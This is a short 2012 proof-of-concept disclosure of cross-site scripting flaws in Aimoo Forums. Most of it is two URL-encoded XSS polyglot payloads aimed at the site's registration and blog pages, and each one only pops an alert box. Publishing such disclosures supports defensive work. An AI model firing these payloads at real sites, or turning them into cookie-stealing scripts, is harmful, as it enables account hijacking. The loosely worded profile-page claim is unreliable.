# Exploit Title: Aimoo Forums Cross Site Scripting
# Date: 25.01.2012
# Author: Sony
# Software Link: http://www.aimoo.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/aimoo-forums-cross-site-scripting.html
..................................................................

We have xss in the registration page:

http://www.aimoo.com/CommunityName-%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E/Create.html

Also in the blog page:

http://zone.aimoo.com/blog/administrator/List/0/1%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

And in the profile page we have html code injection:

http://profile.aimoo.com/neskaju
http://zone.aimoo.com/photo/neskaju

etc..(i think..)

Demo Video:

http://www.youtube.com/watch?v=8EdHWq7LLpY